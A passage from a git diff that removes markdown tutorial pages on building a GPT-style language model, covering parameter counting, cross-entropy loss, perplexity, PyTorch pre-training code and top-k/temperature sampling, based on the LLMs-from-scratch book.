๊ฐ€๋Šฅํ•œ ๊ฐ ํ† ํฐ์— ๋Œ€ํ•œ ํ™•๋ฅ ์„ ์–ป์œผ๋ ค ํ•˜๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. - -## ํ›ˆ๋ จํ•  ๋งค๊ฐœ๋ณ€์ˆ˜ ์ˆ˜ - -GPT ๊ตฌ์กฐ๊ฐ€ ์ •์˜๋˜๋ฉด ํ›ˆ๋ จํ•  ๋งค๊ฐœ๋ณ€์ˆ˜ ์ˆ˜๋ฅผ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: -```python -GPT_CONFIG_124M = { -"vocab_size": 50257, # Vocabulary size -"context_length": 1024, # Context length -"emb_dim": 768, # Embedding dimension -"n_heads": 12, # Number of attention heads -"n_layers": 12, # Number of layers -"drop_rate": 0.1, # Dropout rate -"qkv_bias": False # Query-Key-Value bias -} - -model = GPTModel(GPT_CONFIG_124M) -total_params = sum(p.numel() for p in model.parameters()) -print(f"Total number of parameters: {total_params:,}") -# Total number of parameters: 163,009,536 -``` -### **๋‹จ๊ณ„๋ณ„ ๊ณ„์‚ฐ** - -#### **1. ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด: ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋ฐ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ** - -- **๋ ˆ์ด์–ด:** `nn.Embedding(vocab_size, emb_dim)` -- **๋งค๊ฐœ๋ณ€์ˆ˜:** `vocab_size * emb_dim` -```python -token_embedding_params = 50257 * 768 = 38,597,376 -``` -- **Layer:** `nn.Embedding(context_length, emb_dim)` -- **Parameters:** `context_length * emb_dim` -```python -position_embedding_params = 1024 * 768 = 786,432 -``` -**์ด ์ž„๋ฒ ๋”ฉ ๋งค๊ฐœ๋ณ€์ˆ˜** -```python -embedding_params = token_embedding_params + position_embedding_params -embedding_params = 38,597,376 + 786,432 = 39,383,808 -``` -#### **2. Transformer Blocks** - -12๊ฐœ์˜ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด ์žˆ์œผ๋ฏ€๋กœ, ํ•˜๋‚˜์˜ ๋ธ”๋ก์— ๋Œ€ํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ๊ณ„์‚ฐํ•œ ํ›„ 12๋ฅผ ๊ณฑํ•ฉ๋‹ˆ๋‹ค. - -**ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก๋‹น ๋งค๊ฐœ๋ณ€์ˆ˜** - -**a. ๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ (Multi-Head Attention)** - -- **๊ตฌ์„ฑ ์š”์†Œ:** -- **์ฟผ๋ฆฌ ์„ ํ˜• ๋ ˆ์ด์–ด (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)` -- **ํ‚ค ์„ ํ˜• ๋ ˆ์ด์–ด (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)` -- **๊ฐ’ ์„ ํ˜• ๋ ˆ์ด์–ด (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)` -- **์ถœ๋ ฅ ํ”„๋กœ์ ์…˜ (`out_proj`):** `nn.Linear(emb_dim, emb_dim)` -- **๊ณ„์‚ฐ:** - -- **๊ฐ๊ฐ์˜ `W_query`, `W_key`, `W_value`:** - -```python -qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824 -``` - -์ด๋Ÿฌํ•œ ๋ ˆ์ด์–ด๊ฐ€ ์„ธ ๊ฐœ ์žˆ์œผ๋ฏ€๋กœ: - -```python -total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472 -``` - -- **์ถœ๋ ฅ ํ”„๋กœ์ ์…˜ (`out_proj`):** - -```python -out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592 -``` - -- **์ด ๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ ๋งค๊ฐœ๋ณ€์ˆ˜:** - -```python -mha_params = total_qkv_params + out_proj_params -mha_params = 1,769,472 + 590,592 = 2,360,064 -``` - -**b. ํ”ผ๋“œํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ (FeedForward Network)** - -- **๊ตฌ์„ฑ ์š”์†Œ:** -- **์ฒซ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** `nn.Linear(emb_dim, 4 * emb_dim)` -- **๋‘ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** `nn.Linear(4 * emb_dim, emb_dim)` -- **๊ณ„์‚ฐ:** - -- **์ฒซ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** - -```python -ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim) -ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368 -``` - -- **๋‘ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** - -```python -ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim -ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064 -``` - -- **์ด ํ”ผ๋“œํฌ์›Œ๋“œ ๋งค๊ฐœ๋ณ€์ˆ˜:** - -```python -ff_params = ff_first_layer_params + ff_second_layer_params -ff_params = 2,362,368 + 2,360,064 = 4,722,432 -``` - -**c. ๋ ˆ์ด์–ด ์ •๊ทœํ™” (Layer Normalizations)** - -- **๊ตฌ์„ฑ ์š”์†Œ:** -- ๋ธ”๋ก๋‹น ๋‘ ๊ฐœ์˜ `LayerNorm` ์ธ์Šคํ„ด์Šค. -- ๊ฐ `LayerNorm`์€ `2 * emb_dim` ๋งค๊ฐœ๋ณ€์ˆ˜(์Šค์ผ€์ผ ๋ฐ ์‹œํ”„ํŠธ)๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **๊ณ„์‚ฐ:** - -```python -layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072 -``` - -**d. ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก๋‹น ์ด ๋งค๊ฐœ๋ณ€์ˆ˜** -```python -pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block -params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568 -``` -**๋ชจ๋“  ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์˜ ์ด ๋งค๊ฐœ๋ณ€์ˆ˜** -```python -pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers -total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816 -``` -#### **3. ์ตœ์ข… ๋ ˆ์ด์–ด** - -**a. ์ตœ์ข… ๋ ˆ์ด์–ด ์ •๊ทœํ™”** - -- **๋งค๊ฐœ๋ณ€์ˆ˜:** `2 * emb_dim` (์Šค์ผ€์ผ ๋ฐ ์ด๋™) -```python -pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536 -``` -**b. ์ถœ๋ ฅ ํ”„๋กœ์ ์…˜ ๋ ˆ์ด์–ด (`out_head`)** - -- **๋ ˆ์ด์–ด:** `nn.Linear(emb_dim, vocab_size, bias=False)` -- **ํŒŒ๋ผ๋ฏธํ„ฐ:** `emb_dim * vocab_size` -```python -pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376 -``` -#### **4. ๋ชจ๋“  ๋งค๊ฐœ๋ณ€์ˆ˜ ์š”์•ฝ** -```python -pythonCopy codetotal_params = ( -embedding_params + -total_transformer_blocks_params + -final_layer_norm_params + -output_projection_params -) -total_params = ( -39,383,808 + -85,026,816 + -1,536 + -38,597,376 -) -total_params = 163,009,536 -``` -## ํ…์ŠคํŠธ ์ƒ์„ฑ - -๋‹ค์Œ ํ† ํฐ์„ ์˜ˆ์ธกํ•˜๋Š” ๋ชจ๋ธ์ด ์žˆ์œผ๋ฉด, ์ถœ๋ ฅ์—์„œ ๋งˆ์ง€๋ง‰ ํ† ํฐ ๊ฐ’์„ ๊ฐ€์ ธ์˜ค๊ธฐ๋งŒ ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค(์˜ˆ์ธก๋œ ํ† ํฐ์˜ ๊ฐ’์ด ๋  ๊ฒƒ์ด๋ฏ€๋กœ). ์ด๋Š” **์–ดํœ˜์˜ ๊ฐ ํ•ญ๋ชฉ์— ๋Œ€ํ•œ ๊ฐ’**์ด ๋  ๊ฒƒ์ด๋ฉฐ, ๊ทธ๋Ÿฐ ๋‹ค์Œ `softmax` ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฐจ์›์„ ํ™•๋ฅ ๋กœ ์ •๊ทœํ™”ํ•˜์—ฌ ํ•ฉ์ด 1์ด ๋˜๋„๋ก ํ•˜๊ณ , ๊ฐ€์žฅ ํฐ ํ•ญ๋ชฉ์˜ ์ธ๋ฑ์Šค๋ฅผ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค. ์ด ์ธ๋ฑ์Šค๋Š” ์–ดํœ˜ ๋‚ด์˜ ๋‹จ์–ด์˜ ์ธ๋ฑ์Šค๊ฐ€ ๋ฉ๋‹ˆ๋‹ค. - -์ฝ”๋“œ ์ถœ์ฒ˜ [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb): -```python -def generate_text_simple(model, idx, max_new_tokens, context_size): -# idx is (batch, n_tokens) array of indices in the current context -for _ in range(max_new_tokens): - -# Crop current context if it exceeds the supported context size -# E.g., if LLM supports only 5 tokens, and the context size is 10 -# then only the last 5 tokens are used as context -idx_cond = idx[:, -context_size:] - -# Get the predictions -with torch.no_grad(): -logits = model(idx_cond) - -# Focus only on the last time step -# (batch, n_tokens, vocab_size) becomes (batch, vocab_size) -logits = logits[:, -1, :] - -# Apply softmax to get probabilities -probas = torch.softmax(logits, dim=-1) # (batch, vocab_size) - -# Get the idx of the vocab entry with the highest probability value -idx_next = torch.argmax(probas, dim=-1, keepdim=True) # (batch, 1) - -# Append sampled index to the running sequence -idx = torch.cat((idx, idx_next), dim=1) # (batch, n_tokens+1) - -return idx - - -start_context = "Hello, I am" - -encoded = tokenizer.encode(start_context) -print("encoded:", encoded) - -encoded_tensor = torch.tensor(encoded).unsqueeze(0) -print("encoded_tensor.shape:", encoded_tensor.shape) - -model.eval() # disable dropout - -out = generate_text_simple( -model=model, -idx=encoded_tensor, -max_new_tokens=6, -context_size=GPT_CONFIG_124M["context_length"] -) - -print("Output:", out) -print("Output length:", len(out[0])) -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md deleted file mode 100644 index a9e0a9bb9..000000000 --- a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md +++ /dev/null @@ -1,970 +0,0 @@ -# 6. Pre-training & Loading models - -## Text Generation - -In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**. - -As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose. - -> [!TIP] -> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model. - -## Text Evaluation - -In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens. - -In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**. - -However, instead of working with the raw predictions, it will work with a logarithm with base n. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (baseโ€ฏ*e*) of **7.4541e-05** is approximately **-9.5042**.\ -Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, being the first 4 tokens the last one of the input and the fifth the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input the model doesn't know this) with 5 expected token and therefore 5 probabilities to maximize. - -Therefore, after performing the natural logarithm to each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and thats the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0: - -

https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233

- -Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\ -For example, a perplexity value of 48725, means that when needed to predict a token it's unsure about which among 48,725 tokens in the vocabulary is the good one. - -## Pre-Train Example - -This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb) some times slightly modify - -
- -Previous code used here but already explained in previous sections - -```python -""" -This is code explained before so it won't be exaplained -""" - -import tiktoken -import torch -import torch.nn as nn -from torch.utils.data import Dataset, DataLoader - - -class GPTDatasetV1(Dataset): - def __init__(self, txt, tokenizer, max_length, stride): - self.input_ids = [] - self.target_ids = [] - - # Tokenize the entire text - token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"}) - - # Use a sliding window to chunk the book into overlapping sequences of max_length - for i in range(0, len(token_ids) - max_length, stride): - input_chunk = token_ids[i:i + max_length] - target_chunk = token_ids[i + 1: i + max_length + 1] - self.input_ids.append(torch.tensor(input_chunk)) - self.target_ids.append(torch.tensor(target_chunk)) - - def __len__(self): - return len(self.input_ids) - - def __getitem__(self, idx): - return self.input_ids[idx], self.target_ids[idx] - - -def create_dataloader_v1(txt, batch_size=4, max_length=256, - stride=128, shuffle=True, drop_last=True, num_workers=0): - # Initialize the tokenizer - tokenizer = tiktoken.get_encoding("gpt2") - - # Create dataset - dataset = GPTDatasetV1(txt, tokenizer, max_length, stride) - - # Create dataloader - dataloader = DataLoader( - dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers) - - return dataloader - - -class MultiHeadAttention(nn.Module): - def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False): - super().__init__() - assert d_out % num_heads == 0, "d_out must be divisible by n_heads" - - self.d_out = d_out - self.num_heads = num_heads - self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim - - self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) - self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) - self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) - self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs - self.dropout = nn.Dropout(dropout) - self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) - - def forward(self, x): - b, num_tokens, d_in = x.shape - - keys = self.W_key(x) # Shape: (b, num_tokens, d_out) - queries = self.W_query(x) - values = self.W_value(x) - - # We implicitly split the matrix by adding a `num_heads` dimension - # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim) - keys = keys.view(b, num_tokens, self.num_heads, self.head_dim) - values = values.view(b, num_tokens, self.num_heads, self.head_dim) - queries = queries.view(b, num_tokens, self.num_heads, self.head_dim) - - # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim) - keys = keys.transpose(1, 2) - queries = queries.transpose(1, 2) - values = values.transpose(1, 2) - - # Compute scaled dot-product attention (aka self-attention) with a causal mask - attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head - - # Original mask truncated to the number of tokens and converted to boolean - mask_bool = self.mask.bool()[:num_tokens, :num_tokens] - - # Use the mask to fill attention scores - attn_scores.masked_fill_(mask_bool, -torch.inf) - - attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) - attn_weights = self.dropout(attn_weights) - - # Shape: (b, num_tokens, num_heads, head_dim) - context_vec = (attn_weights @ values).transpose(1, 2) - - # Combine heads, where self.d_out = self.num_heads * self.head_dim - context_vec = context_vec.reshape(b, num_tokens, self.d_out) - context_vec = self.out_proj(context_vec) # optional projection - - return context_vec - - -class LayerNorm(nn.Module): - def __init__(self, emb_dim): - super().__init__() - self.eps = 1e-5 - self.scale = nn.Parameter(torch.ones(emb_dim)) - self.shift = nn.Parameter(torch.zeros(emb_dim)) - - def forward(self, x): - mean = x.mean(dim=-1, keepdim=True) - var = x.var(dim=-1, keepdim=True, unbiased=False) - norm_x = (x - mean) / torch.sqrt(var + self.eps) - return self.scale * norm_x + self.shift - - -class GELU(nn.Module): - def __init__(self): - super().__init__() - - def forward(self, x): - return 0.5 * x * (1 + torch.tanh( - torch.sqrt(torch.tensor(2.0 / torch.pi)) * - (x + 0.044715 * torch.pow(x, 3)) - )) - - -class FeedForward(nn.Module): - def __init__(self, cfg): - super().__init__() - self.layers = nn.Sequential( - nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]), - GELU(), - nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]), - ) - - def forward(self, x): - return self.layers(x) - - -class TransformerBlock(nn.Module): - def __init__(self, cfg): - super().__init__() - self.att = MultiHeadAttention( - d_in=cfg["emb_dim"], - d_out=cfg["emb_dim"], - context_length=cfg["context_length"], - num_heads=cfg["n_heads"], - dropout=cfg["drop_rate"], - qkv_bias=cfg["qkv_bias"]) - self.ff = FeedForward(cfg) - self.norm1 = LayerNorm(cfg["emb_dim"]) - self.norm2 = LayerNorm(cfg["emb_dim"]) - self.drop_shortcut = nn.Dropout(cfg["drop_rate"]) - - def forward(self, x): - # Shortcut connection for attention block - shortcut = x - x = self.norm1(x) - x = self.att(x) # Shape [batch_size, num_tokens, emb_size] - x = self.drop_shortcut(x) - x = x + shortcut # Add the original input back - - # Shortcut connection for feed-forward block - shortcut = x - x = self.norm2(x) - x = self.ff(x) - x = self.drop_shortcut(x) - x = x + shortcut # Add the original input back - - return x - - -class GPTModel(nn.Module): - def __init__(self, cfg): - super().__init__() - self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"]) - self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"]) - self.drop_emb = nn.Dropout(cfg["drop_rate"]) - - self.trf_blocks = nn.Sequential( - *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]) - - self.final_norm = LayerNorm(cfg["emb_dim"]) - self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False) - - def forward(self, in_idx): - batch_size, seq_len = in_idx.shape - tok_embeds = self.tok_emb(in_idx) - pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device)) - x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size] - x = self.drop_emb(x) - x = self.trf_blocks(x) - x = self.final_norm(x) - logits = self.out_head(x) - return logits -``` - -
- -```python -# Download contents to train the data with -import os -import urllib.request - -file_path = "the-verdict.txt" -url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt" - -if not os.path.exists(file_path): - with urllib.request.urlopen(url) as response: - text_data = response.read().decode('utf-8') - with open(file_path, "w", encoding="utf-8") as file: - file.write(text_data) -else: - with open(file_path, "r", encoding="utf-8") as file: - text_data = file.read() - -total_characters = len(text_data) -tokenizer = tiktoken.get_encoding("gpt2") -total_tokens = len(tokenizer.encode(text_data)) - -print("Data downloaded") -print("Characters:", total_characters) -print("Tokens:", total_tokens) - -# Model initialization -GPT_CONFIG_124M = { - "vocab_size": 50257, # Vocabulary size - "context_length": 256, # Shortened context length (orig: 1024) - "emb_dim": 768, # Embedding dimension - "n_heads": 12, # Number of attention heads - "n_layers": 12, # Number of layers - "drop_rate": 0.1, # Dropout rate - "qkv_bias": False # Query-key-value bias -} - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -model.eval() -print ("Model initialized") - - -# Functions to transform from tokens to ids and from to ids to tokens -def text_to_token_ids(text, tokenizer): - encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'}) - encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension - return encoded_tensor - -def token_ids_to_text(token_ids, tokenizer): - flat = token_ids.squeeze(0) # remove batch dimension - return tokenizer.decode(flat.tolist()) - - - -# Define loss functions -def calc_loss_batch(input_batch, target_batch, model, device): - input_batch, target_batch = input_batch.to(device), target_batch.to(device) - logits = model(input_batch) - loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten()) - return loss - - -def calc_loss_loader(data_loader, model, device, num_batches=None): - total_loss = 0. - if len(data_loader) == 0: - return float("nan") - elif num_batches is None: - num_batches = len(data_loader) - else: - # Reduce the number of batches to match the total number of batches in the data loader - # if num_batches exceeds the number of batches in the data loader - num_batches = min(num_batches, len(data_loader)) - for i, (input_batch, target_batch) in enumerate(data_loader): - if i < num_batches: - loss = calc_loss_batch(input_batch, target_batch, model, device) - total_loss += loss.item() - else: - break - return total_loss / num_batches - - -# Apply Train/validation ratio and create dataloaders -train_ratio = 0.90 -split_idx = int(train_ratio * len(text_data)) -train_data = text_data[:split_idx] -val_data = text_data[split_idx:] - -torch.manual_seed(123) - -train_loader = create_dataloader_v1( - train_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=True, - shuffle=True, - num_workers=0 -) - -val_loader = create_dataloader_v1( - val_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=False, - shuffle=False, - num_workers=0 -) - - -# Sanity checks -if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the training loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "increase the `training_ratio`") - -if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the validation loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "decrease the `training_ratio`") - -print("Train loader:") -for x, y in train_loader: - print(x.shape, y.shape) - -print("\nValidation loader:") -for x, y in val_loader: - print(x.shape, y.shape) - -train_tokens = 0 -for input_batch, target_batch in train_loader: - train_tokens += input_batch.numel() - -val_tokens = 0 -for input_batch, target_batch in val_loader: - val_tokens += input_batch.numel() - -print("Training tokens:", train_tokens) -print("Validation tokens:", val_tokens) -print("All tokens:", train_tokens + val_tokens) - - -# Indicate the device to use -if torch.cuda.is_available(): - device = torch.device("cuda") -elif torch.backends.mps.is_available(): - device = torch.device("mps") -else: - device = torch.device("cpu") - -print(f"Using {device} device.") - -model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes - - - -# Pre-calculate losses without starting yet -torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader - -with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet - train_loss = calc_loss_loader(train_loader, model, device) - val_loss = calc_loss_loader(val_loader, model, device) - -print("Training loss:", train_loss) -print("Validation loss:", val_loss) - - -# Functions to train the data -def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs, - eval_freq, eval_iter, start_context, tokenizer): - # Initialize lists to track losses and tokens seen - train_losses, val_losses, track_tokens_seen = [], [], [] - tokens_seen, global_step = 0, -1 - - # Main training loop - for epoch in range(num_epochs): - model.train() # Set model to training mode - - for input_batch, target_batch in train_loader: - optimizer.zero_grad() # Reset loss gradients from previous batch iteration - loss = calc_loss_batch(input_batch, target_batch, model, device) - loss.backward() # Calculate loss gradients - optimizer.step() # Update model weights using loss gradients - tokens_seen += input_batch.numel() - global_step += 1 - - # Optional evaluation step - if global_step % eval_freq == 0: - train_loss, val_loss = evaluate_model( - model, train_loader, val_loader, device, eval_iter) - train_losses.append(train_loss) - val_losses.append(val_loss) - track_tokens_seen.append(tokens_seen) - print(f"Ep {epoch+1} (Step {global_step:06d}): " - f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}") - - # Print a sample text after each epoch - generate_and_print_sample( - model, tokenizer, device, start_context - ) - - return train_losses, val_losses, track_tokens_seen - - -def evaluate_model(model, train_loader, val_loader, device, eval_iter): - model.eval() - with torch.no_grad(): - train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter) - val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter) - model.train() - return train_loss, val_loss - - -def generate_and_print_sample(model, tokenizer, device, start_context): - model.eval() - context_size = model.pos_emb.weight.shape[0] - encoded = text_to_token_ids(start_context, tokenizer).to(device) - with torch.no_grad(): - token_ids = generate_text( - model=model, idx=encoded, - max_new_tokens=50, context_size=context_size - ) - decoded_text = token_ids_to_text(token_ids, tokenizer) - print(decoded_text.replace("\n", " ")) # Compact print format - model.train() - - -# Start training! -import time -start_time = time.time() - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -model.to(device) -optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1) - -num_epochs = 10 -train_losses, val_losses, tokens_seen = train_model_simple( - model, train_loader, val_loader, optimizer, device, - num_epochs=num_epochs, eval_freq=5, eval_iter=5, - start_context="Every effort moves you", tokenizer=tokenizer -) - -end_time = time.time() -execution_time_minutes = (end_time - start_time) / 60 -print(f"Training completed in {execution_time_minutes:.2f} minutes.") - - - -# Show graphics with the training process -import matplotlib.pyplot as plt -from matplotlib.ticker import MaxNLocator -import math -def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses): - fig, ax1 = plt.subplots(figsize=(5, 3)) - ax1.plot(epochs_seen, train_losses, label="Training loss") - ax1.plot( - epochs_seen, val_losses, linestyle="-.", label="Validation loss" - ) - ax1.set_xlabel("Epochs") - ax1.set_ylabel("Loss") - ax1.legend(loc="upper right") - ax1.xaxis.set_major_locator(MaxNLocator(integer=True)) - ax2 = ax1.twiny() - ax2.plot(tokens_seen, train_losses, alpha=0) - ax2.set_xlabel("Tokens seen") - fig.tight_layout() - plt.show() - - # Compute perplexity from the loss values - train_ppls = [math.exp(loss) for loss in train_losses] - val_ppls = [math.exp(loss) for loss in val_losses] - # Plot perplexity over tokens seen - plt.figure() - plt.plot(tokens_seen, train_ppls, label='Training Perplexity') - plt.plot(tokens_seen, val_ppls, label='Validation Perplexity') - plt.xlabel('Tokens Seen') - plt.ylabel('Perplexity') - plt.title('Perplexity over Training') - plt.legend() - plt.show() - -epochs_tensor = torch.linspace(0, num_epochs, len(train_losses)) -plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses) - - -torch.save({ - "model_state_dict": model.state_dict(), - "optimizer_state_dict": optimizer.state_dict(), - }, -"/tmp/model_and_optimizer.pth" -) -``` - -Let's see an explanation step by step - -### Functions to transform text <--> ids - -These are some simple functions that can be used to transform from texts from the vocabulary to ids and backwards. This is needed at the begging of the handling of the text and at the end fo the predictions: - -```python -# Functions to transform from tokens to ids and from to ids to tokens -def text_to_token_ids(text, tokenizer): - encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'}) - encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension - return encoded_tensor - -def token_ids_to_text(token_ids, tokenizer): - flat = token_ids.squeeze(0) # remove batch dimension - return tokenizer.decode(flat.tolist()) -``` - -### Generate text functions - -In a previos section a function that just got the **most probable token** after getting the logits. However, this will mean that for each entry the same output is always going to be generated which makes it very deterministic. - -The following `generate_text` function, will apply the `top-k` , `temperature` and `multinomial` concepts. - -- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens expect of the top k tokens. So, if k=3, before making a decision only the 3 most probably tokens will have a probability different from `-inf`. -- The **`temperature`** means that every probability will be divided by the temperature value. A value of `0.1` will improve the highest probability compared with the lowest one, while a temperature of `5` for example will make it more flat. This helps to improve to variation in responses we would like the LLM to have. -- After applying the temperature, a **`softmax`** function is applied again to make all the reminding tokens have a total probability of 1. -- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had a 70% of probabilities, token 2 a 20% and token 3 a 10%, 70% of the times token 1 will be selected, 20% of the times it will be token 2 and 10% of the times will be 10%. - -```python -# Generate text function -def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None): - - # For-loop is the same as before: Get logits, and only focus on last time step - for _ in range(max_new_tokens): - idx_cond = idx[:, -context_size:] - with torch.no_grad(): - logits = model(idx_cond) - logits = logits[:, -1, :] - - # New: Filter logits with top_k sampling - if top_k is not None: - # Keep only top_k values - top_logits, _ = torch.topk(logits, top_k) - min_val = top_logits[:, -1] - logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits) - - # New: Apply temperature scaling - if temperature > 0.0: - logits = logits / temperature - - # Apply softmax to get probabilities - probs = torch.softmax(logits, dim=-1) # (batch_size, context_len) - - # Sample from the distribution - idx_next = torch.multinomial(probs, num_samples=1) # (batch_size, 1) - - # Otherwise same as before: get idx of the vocab entry with the highest logits value - else: - idx_next = torch.argmax(logits, dim=-1, keepdim=True) # (batch_size, 1) - - if idx_next == eos_id: # Stop generating early if end-of-sequence token is encountered and eos_id is specified - break - - # Same as before: append sampled index to the running sequence - idx = torch.cat((idx, idx_next), dim=1) # (batch_size, num_tokens+1) - - return idx -``` - -> [!NOTE] -> There is a common alternative to `top-k` called 